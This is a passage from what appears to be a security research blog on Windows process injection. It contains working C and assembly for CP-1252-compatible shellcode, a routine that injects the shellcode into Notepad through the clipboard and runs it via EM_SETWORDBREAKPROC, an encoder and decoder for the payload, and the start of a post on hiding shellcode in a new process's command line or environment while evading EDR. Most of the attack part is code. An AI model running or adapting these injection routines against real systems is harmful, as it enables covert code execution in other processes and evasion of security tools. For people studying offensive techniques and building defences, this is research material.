      /* 0047 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 004A */ "\x59"                     /* pop   rcx                   */
      /* 004B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 004E */ "\x6a\x00"                 /* push  0                     */
      /* 0050 */ "\x54"                     /* push  rsp                   */
      /* 0051 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0054 */ "\x58"                     /* pop   rax                   */
      /* 0055 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov   dword [rax], 0x6c0063 */
      /* 005E */ "\x58"                     /* pop   rax                   */
      /* 005F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0062 */ "\x35\x00\x61\x00\x63"     /* xor   eax, 0x63006100       */
      /* 0067 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 006A */ "\xab"                     /* stosd                       */
      /* 006B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 006E */ "\x6a\x00"                 /* push  0                     */
      /* 0070 */ "\x54"                     /* push  rsp                   */
      /* 0071 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0074 */ "\x58"                     /* pop   rax                   */
      /* 0075 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0078 */ "\xc6\x00\x05"             /* mov   byte [rax], 5         */
      /* 007B */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 007E */ "\x5a"                     /* pop   rdx                   */
      /* 007F */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0082 */ "\x53"                     /* push  rbx                   */
      /* 0083 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0086 */ "\x6a\x00"                 /* push  0                     */
      /* 0088 */ "\x6a\x00"                 /* push  0                     */
      /* 008A */ "\x6a\x00"                 /* push  0                     */
      /* 008C */ "\x6a\x00"                 /* push  0                     */
      /* 008E */ "\x6a\x00"                 /* push  0                     */
      /* 0090 */ "\x53"                     /* push  rbx                   */
      /* 0091 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0094 */ "\x90"                     /* nop                         */
      /* 0095 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 0098 */ "\x90"                     /* nop                         */
      /* 0099 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 009C */ "\x90"                     /* nop                         */
      /* 009D */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
      /* 00A0 */ "\x90"                     /* nop                         */
      /* 00A1 */ "\x00\x4d\x00"             /* add   byte [rbp], cl        */
    };
    
    #define CALC4_SIZE 79
    #define RET_OFS2 0x18 + 2
    
    char CALC4[] = {
      /* 0000 */ "\x59"                 /* pop  rcx              */
      /* 0001 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0004 */ "\x59"                 /* pop  rcx              */
      /* 0005 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0008 */ "\x59"                 /* pop  rcx              */
      /* 0009 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 000C */ "\x59"                 /* pop  rcx              */
      /* 000D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0010 */ "\x59"                 /* pop  rcx              */
      /* 0011 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0014 */ "\x59"                 /* pop  rcx              */
      /* 0015 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov  eax, 0xff004d00  */
      /* 001D */ "\x00\xe1"             /* add  cl, ah           */
      /* 001F */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0022 */ "\x51"                 /* push rcx              */
      /* 0023 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0026 */ "\x58"                 /* pop  rax              */
      /* 0027 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 002A */ "\xc6\x00\xc3"         /* mov  byte [rax], 0xc3 */
      /* 002D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0030 */ "\x59"                 /* pop  rcx              */
      /* 0031 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0034 */ "\x5b"                 /* pop  rbx              */
      /* 0035 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0038 */ "\x5e"                 /* pop  rsi              */
      /* 0039 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 003C */ "\x5f"                 /* pop  rdi              */
      /* 003D */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0040 */ "\x59"                 /* pop  rcx              */
      /* 0041 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 0044 */ "\x6a\x00"             /* push 0                */
      /* 0046 */ "\x58"                 /* pop  rax              */
      /* 0047 */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 004A */ "\x5c"                 /* pop  rsp              */
      /* 004B */ "\x00\x4d\x00"         /* add  byte [rbp], cl   */
      /* 004E */ "\x5d"                 /* pop  rbp              */
    };
    
    
    static
    u8* cp1252_generate_winexec(int pid, int *cslen) {
        int     i, ofs, outlen;
        u8      *cs, *out;
        HMODULE m;
        w64_t   addr;
        
        // it won't exceed 512 bytes
        out = (u8*)cs = VirtualAlloc(
          NULL, 4096, 
          MEM_COMMIT | MEM_RESERVE, 
          PAGE_EXECUTE_READWRITE);
        
        // initialize parameters for WinExec()
        memcpy(out, CALC3, CALC3_SIZE);
        out += CALC3_SIZE;
    
        // initialize RDI for writing
        memcpy(out, STORE_ADDR, STORE_ADDR_SIZE);
        out += STORE_ADDR_SIZE;
    
        // ***********************************
        // store kernel32!WinExec on stack
        m = GetModuleHandle("kernel32");
        addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m);
        m = GetProcessModuleHandle(pid, "kernel32.dll");
        addr.q += (ULONG_PTR)m;
        
        for(i=0; i<MAX_ADDR; i++) {      
          // load a byte into AH
          memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE);
          out[2] = addr.b[i];
        
          // if byte not allowed for CP1252, add 32
          if(!is_cp1252_allowed(out[2])) {
            out[2] += 32;
            // subtract 32 from byte at runtime
            memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE);
            out += SUB_BYTE_SIZE;
          }
          out += LOAD_BYTE_SIZE;
          // store AH in [RDI], increment RDI
          memcpy(out, STORE_BYTE, STORE_BYTE_SIZE);
          out += STORE_BYTE_SIZE;
        }
        
        // calculate length of constructed code
        ofs = (int)(out - (u8*)cs) + 2;
        
        // first offset
        cs[RET_OFS] = (uint8_t)ofs;
        
        memcpy(out, RET, RET_SIZE);
        out += RET_SIZE;
        
        memcpy(out, CALC4, CALC4_SIZE);
        
        // second offset
        ofs = CALC4_SIZE;
        ((u8*)out)[RET_OFS2] = (uint8_t)ofs;
        out += CALC4_SIZE;
        
        outlen = ((int)(out - (u8*)cs) + 1) & -2;
    
        // convert to ascii
        for(i=0; i<=outlen; i+=2) {
          cs[i/2] = cs[i];
        }
    
        *cslen = outlen / 2;
        // return pointer to code
        return cs;
    }
    

    5. Injecting and Executing Shellcode

    The following steps are used.

    1. Execute notepad.exe and obtain a window handle for the edit control.
    2. Get the edit control handle using the EM_GETHANDLE message.
    3. Generate text equivalent to, or greater than the size of the shellcode and copy it to the clipboard.
    4. Assign a NULL pointer to lastbuf
    5. Read the address of input buffer from the EM handle and assign to embuf.
    6. If lastbuf and embuf are equal. Goto step 9.
    7. Clear the memory buffer using WM_SETSEL and WM_CLEAR.
    8. Send the WM_PASTE message to the edit control window handle. Wait 1 second, then goto step 5.
    9. Set embuf to PAGE_EXECUTE_READWRITE.
    10. Generate CP-1252 compatible shellcode and copy to the clipboard.
    11. Set the edit control word break function to embuf using EM_SETWORDBREAKPROC
    12. Trigger execution of shellcode using WM_LBUTTONDBLCLK
    BOOL em_inject(void) {
        HWND   npw, ecw;
        w64_t  emh, lastbuf, embuf;
        SIZE_T rd;
        HANDLE hp;
        DWORD  cslen, pid, old;
        BOOL   r;
        PBYTE  cs;
        
        char   buf[1024];
        
        // get window handle for notepad class
        npw = FindWindow("Notepad", NULL);
        
        // get window handle for edit control
        ecw = FindWindowEx(npw, NULL, "Edit", NULL);
        
        // get the EM handle for the edit control
        emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0);
        
        // get the process id for the window
        GetWindowThreadProcessId(ecw, &pid);
        
        // open the process for reading and changing memory permissions
        hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid);
    
        // copy some test data to the clipboard
        memset(buf, 0x4d, sizeof(buf));
        CopyToClipboard(CF_TEXT, buf, sizeof(buf));    
        
        // loop until target buffer address is stable
        lastbuf.p = NULL;
        r = FALSE;
    
        for(;;) {
          // read the address of input buffer     
          ReadProcessMemory(hp, emh.p, 
            &embuf.p, sizeof(ULONG_PTR), &rd);
    
          // Address hasn't changed? exit loop
          if(embuf.p == lastbuf.p) {
            r = TRUE;
            break;
          }
          // save this address
          lastbuf.p = embuf.p;
        
          // clear the contents of edit control
          SendMessage(ecw, EM_SETSEL, 0, -1);
          SendMessage(ecw, WM_CLEAR, 0, 0);
          
          // send the WM_PASTE message to the edit control
          // allow notepad some time to read the data from clipboard
          SendMessage(ecw, WM_PASTE, 0, 0);
          Sleep(WAIT_TIME);
        }
        
        if(r) {
          // set buffer to RWX
          VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old);
            
          // generate shellcode and copy to clipboard
          cs = cp1252_generate_winexec(pid, &cslen);
          CopyToClipboard(CF_TEXT, cs, cslen);
            
          // clear buffer and inject shellcode
          SendMessage(ecw, EM_SETSEL, 0, -1);
          SendMessage(ecw, WM_CLEAR, 0, 0);
          SendMessage(ecw, WM_PASTE, 0, 0);
          Sleep(WAIT_TIME);
          
          // set the word break procedure to address of shellcode and execute
          SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p);
          SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
          SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
          
          // set buffer to RW
          VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old);
        }
        CloseHandle(hp);
        return r;
    }
    

    6. Demonstration

    Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.

    7. Encoding Arbitrary Data

    Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.

    7.1 Encoding

    1. Read a byte from the input file or stream and assign to X.
    2. If X plus 1 is allowed, goto step 6.
    3. Save escape code (0x01) to the output file or stream.
    4. XOR X with 8-Bit key.
    5. Save X to the output file or stream, goto step 7.
    6. Save X plus 1 to the output file or stream.
    7. Repeat steps 1-6 until EOF.
    // encode raw data to CP-1252 compatible data
    static
    void cp1252_encode(FILE *in, FILE *out) {
        uint8_t c, t;
        
        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // if the result of c + 1 is disallowed
          if(!is_decoder_allowed(c + 1)) {
            // write escape code
            putc(0x01, out);
            // save byte XOR'd with the 8-Bit key
            putc(c ^ CP1252_KEY, out);
          } else {
            // save byte plus 1
            putc(c + 1, out);
          }
        }
    }
    

    7.2 Decoding

    1. Read a byte from the input file or stream and assign to X.
    2. If X is not an escape code, goto step 6.
    3. Read a byte from the input file or stream and assign to X.
    4. XOR X with 8-Bit key.
    5. Save X to the output file or stream, goto step 7.
    6. Save X – 1 to the output file or stream.
    7. Repeat steps 1-6 until EOF.
    // decode data processed with cp1252_encode to their original values
    static
    void cp1252_decode(FILE *in, FILE *out) {
        uint8_t c, t;
        
        for(;;) {
          // read byte
          c = getc(in);
          // end of file? exit
          if(feof(in)) break;
          // if this is an escape code
          if(c == 0x01) {
            // read next byte
            c = getc(in);
            // XOR the 8-Bit key
            putc(c ^ CP1252_KEY, out);
          } else {
            // save byte minus one
            putc(c - 1, out);
          }
        }
    }
    

    The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.

    ; cp1252 decoder in 40 bytes of x86/amd64 assembly
    ; presumes to be executing in RWX memory
    ; needs stack allocation if executing from RX memory
    ;
    ; odzhan
    
        bits 32
        
        %define CP1252_KEY 0x4D
        
        jmp    init_decode       ; read the program counter
        
        ; esi = source
        ; edi = destination 
        ; ecx = length
    decode_bytes:
        lodsb                    ; read a byte
        dec    al                ; c - 1
        jnz    save_byte
        lodsb                    ; skip null byte
        lodsb                    ; read next byte
        xor    al, CP1252_KEY    ; c ^= CP1252_KEY
    save_byte:
        stosb                    ; save in buffer
        lodsb                    ; skip null byte
        loop   decode_bytes
        ret
    load_data:
        pop    esi               ; esi = start of data
        ; ********************** ; decode the 32-bit length
    read_len:
        push   0                 ; len = 0
        push   esp               ; 
        pop    edi               ; edi = &len
        push   4                 ; 32-bits
        pop    ecx
        call   decode_bytes
        pop    ecx               ; ecx = len
        
        ; ********************** ; decode remainder of data
        push   esi               ; 
        pop    edi               ; edi = encoded data
        push   esi               ; save address for RET
        jmp    decode_bytes
    init_decode:
        call   load_data
        ; CP1252 encoded data goes here..
        
    

    The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.

    8. Acknowledgements

    I’d like to thank Adam for feedback and advice on this post. Specifically about CF_UNICODETEXT.

    9. Further Research

    List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.

    10. Code Scrapheap

    What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.

    The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 can’t be used.

    "\xb0\x00"     /* mov  al, 0             */
    "\x00\x4d\x00" /* add  byte [ebp], cl    */
    "\xb4\x00"     /* mov  ah, 0             */
    "\x00\x4d\x00" /* add  byte [ebp], cl    */
    "\x98"         /* cwde                   */
    

    Another idea for seting EAX to 0. Clear the Carry Flag using CLC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0. Can you spot the problem? 🙂 Well, the ADD affects the Carry Flag, so that’s why it doesn’t work as intended. Of course, it might work, depending on what RBP points to and the value of CL.

    "\xf8"                 /* clc                       */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.

    "\xf9"                 /* stc                       */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.

    "\x6a\x00"             /* push  0                     */
    "\x58"                 /* pop   rax                   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl        */
    "\xf9"                 /* stc                         */
    "\x00\x4d\x00"         /* add   byte [rbp], cl        */
    "\x14\x00"             /* adc   al, 0                 */
    

    Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is 0x99 converts to a double byte encoding.

    "\x6a\x00"     /* push 0                 */
    "\x54"         /* push rsp               */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x58"         /* pop  rax               */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\xff\x00"     /* inc  dword [rax]       */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\xc1\x00\x1f" /* rol  dword [rax], 0x1f */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x58"         /* pop  rax               */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x99"         /* cdq                    */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x92"         /* xchg eax, edx          */
    

    I examined various ways to simulate instructions and conceded it could only work using self-modifying code. Using boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address of where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There’s no JMP, Jcc or CALL instructions that can be used directly.

    If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.

    "\x39\xd8"             /* cmp   eax, ebx           */
    

    There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB generates the wrong result.

    "\x50"                 /* push  rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x5e"                 /* pop   rsi                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x53"                 /* push  rbx                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x5f"                 /* pop   rdi                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xa7"                 /* cmpsd                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x6a\x00"             /* push  0                      */
    "\x58"                 /* pop   rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x1c\x00"             /* sbb   al, 0                  */
    "\x50"                 /* push  rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x58"                 /* pop   rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xc1\x00\x18"         /* rol   dword ptr [rax], 0x18  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x58"                 /* pop   rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x6a\x00"             /* push  0                      */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x5f"                 /* pop   rdi                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    

    Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.

    "\xb8\x00\x07\x00\xff" /* mov   eax, 0xff000700    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl     */
    "\x9e"                 /* sahf                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl     */
    "\x1d\x00\x07\x00\xff" /* sbb   eax, 0xff000700    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl     */
    

    Two problems: SAHF is a byte we can’t use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored in address rbp contains and the value of CL.

    Adding -1 will subtract 1 from the variable EAX contains the address of.

    "\x6a\x00"             /* push  0                    */
    "\x54"                 /* push  rsp                  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl       */
    "\x58"                 /* pop   rax                  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl       */
    "\x83\x00\xff"         /* add   dword  [eax], -1  */
    "\x58"                 /* pop   rax                  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl       */
    

    Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.

    Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into rdi. Store AL in variable four times before loading into RAX. Doesn’t work once the addition after STC is executed.

    "\xf9"                 /* stc                       */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x1c\x00"             /* sbb   al, 0               */
    "\x6a\x00"             /* push  0                   */
    "\x54"                 /* push  rsp                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x5f"                 /* pop   rdi                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x58"                 /* pop   rax                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    The next snippet simply copies the value of RCX to RAX. It’s overcomplicated and the POP QWORD instruction might be useful in some scenario. I just didn’t find it useful.

    "\x6a\x00"             /* push  0              */
    "\x54"                 /* push  rsp            */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x58"                 /* pop   rax            */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x51"                 /* push  rcx            */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x8f\x00"             /* pop   qword [rax]    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x5f"                 /* pop   rax            */
    

    Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isn’t useful.

        push   0
        pop    rcx
        xnop
        push   rbp              ; save rbp      
        xnop
        ; 1. ====================================
        push   0                ; store 0 as X
        push   rsp              ; store &X
        xnop
        pop    rbp              ; load &X
        xnop
        ; 2. ====================================
        mov    eax, 0xFF001200  ; load 0xFF001200
        add    [rbp], ah        ; add 0x12
        adc    al, 0            ; AL = CF
        push   rbp              ; store &X
        xnop
        push   rsp              ; store &&X
        xnop
        pop    rax              ; load &&X
        xnop
        inc    dword[rax]       ; &X++
        pop    rbp
        xnop
        add    [rbp], al        ; add CF
        ; 3. ====================================
    

    Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero because anything that uses it requires a REX prefix. I’m leaving here in the event R8 is already zero..

        ; read byte from table 2
        lodsb
        add [rbp], cl
        add byte[rax+r8+1], al   ; copy to table 1
        add [rbp], cl
        
        lodsb
        add [rbp], cl
        add byte[rax+r8+3], al
        add [rbp], cl
        
        lodsb
        add [rbp], cl
        add byte[rax+r8+5], al
        add [rbp], cl
        
        ; and so on..
        
        ; execute
        push rax
        ret
    

    Using the above instruction to add 8-bits to 32-bit word.

        ; step 1
        push   rax              ; save pointer
        add    byte[rbp], cl
        add    byte[rax+r8], bl ; A[0] += B[0]
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
        
        ; step 2
        push   rax              ; save pointer
        add    byte[rbp], cl
        rol    dword[rax], 24   
        add    byte[rbp], cl
        add    byte[rax+r8], cl ; A[1] += CF
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
        
        ; step 3
        push   rax              ; save pointer
        add    byte[rbp], cl
        rol    dword[rax], 24    
        add    byte[rbp], cl
        add    byte[rax+r8], cl ; A[2] += CF
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
    
        ; step 4
        push   rax              ; save pointer
        add    byte[rbp], cl
        rol    dword[rax], 24    
        add    byte[rbp], cl
        add    byte[rax+r8], cl ; A[3] += CF
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
        
        ; step 5
        rol    dword[rax], 24
        add    byte[rbp], cl
    

    As you can see, it’s a mess to try simulate instructions instead of just writing the code to memory and executing that way…or use CF_UNICODETEXT for copying to the clipboard. 😉

    em_demo

    Windows Process Injection: Command Line and Environment Variables

    By: odzhan
    31 July 2020 at 04:00

    Windows Process Injection: Command Line and Environment Variables

    Contents

    1. Introduction
    2. Shellcode
    3. Environment Variables
    4. Command Line
    5. Window Title
    6. Runtime Data

    1. Introduction

    There are many ways to load shellcode into the address space of a process, but knowing precisely where it’s stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processes’ address space. Red Teamers are known to create a new process before injecting data, but I’ve yet to see any examples of using the command line or environment variables to assist with this.

    This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. Memory for where the data resides will initially have Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS that contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

    typedef struct _RTL_USER_PROCESS_PARAMETERS {
        ULONG MaximumLength;                            //0x0
        ULONG Length;                                   //0x4
        ULONG Flags;                                    //0x8
        ULONG DebugFlags;                               //0xc
        PVOID ConsoleHandle;                            //0x10
        ULONG ConsoleFlags;                             //0x18
        PVOID StandardInput;                            //0x20
        PVOID StandardOutput;                           //0x28
        PVOID StandardError;                            //0x30
        CURDIR CurrentDirectory;                        //0x38
        UNICODE_STRING DllPath;                         //0x50
        UNICODE_STRING ImagePathName;                   //0x60
        UNICODE_STRING CommandLine;                     //0x70
        PVOID Environment;                              //0x80
        ULONG StartingX;                                //0x88
        ULONG StartingY;                                //0x8c
        ULONG CountX;                                   //0x90
        ULONG CountY;                                   //0x94
        ULONG CountCharsX;                              //0x98
        ULONG CountCharsY;                              //0x9c
        ULONG FillAttribute;                            //0xa0
        ULONG WindowFlags;                              //0xa4
        ULONG ShowWindowFlags;                          //0xa8
        UNICODE_STRING WindowTitle;                     //0xb0
        UNICODE_STRING DesktopInfo;                     //0xc0
        UNICODE_STRING ShellInfo;                       //0xd0
        UNICODE_STRING RuntimeData;                     //0xe0
        RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
        ULONG EnvironmentSize;                          //0x3f0
    } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 
    

    2. Shellcode

    User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

          bits 64
          
          %include "include.inc"
          
          struc stk_mem
            .hs                   resb home_space_size
            
            .bInheritHandles      resq 1
            .dwCreationFlags      resq 1
            .lpEnvironment        resq 1
            .lpCurrentDirectory   resq 1
            .lpStartupInfo        resq 1
            .lpProcessInformation resq 1
            
            .procinfo             resb PROCESS_INFORMATION_size
            .startupinfo          resb STARTUPINFO_size
          endstruc
    
          %define stk_size ((stk_mem_size + 15) & -16) - 8
          
          %ifndef BIN
            global createproc
          %endif
          
          ; void createproc(WCHAR cmd[]);
    createproc:
          ; save non-volatile registers
          pushx  rsi, rbx, rdi, rbp
          
          ; allocate stack memory for arguments + home space
          xor    eax, eax
          mov    al, stk_size
          sub    rsp, rax
          
          ; save pointer to buffer
          push   rcx
          
          push   TEB.ProcessEnvironmentBlock
          pop    r11
          mov    rax, [gs:r11]
          mov    rax, [rax+PEB.Ldr]
          mov    rdi, [rax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
          jmp    scan_dll
    next_dll:    
          mov    rdi, [rdi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
    scan_dll:
          mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]
    
          mov    esi, [rbx+IMAGE_DOS_HEADER.e_lfanew]
          add    esi, r11d             ; add 60h or TEB.ProcessEnvironmentBlock
          ; ecx = IMAGE_DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
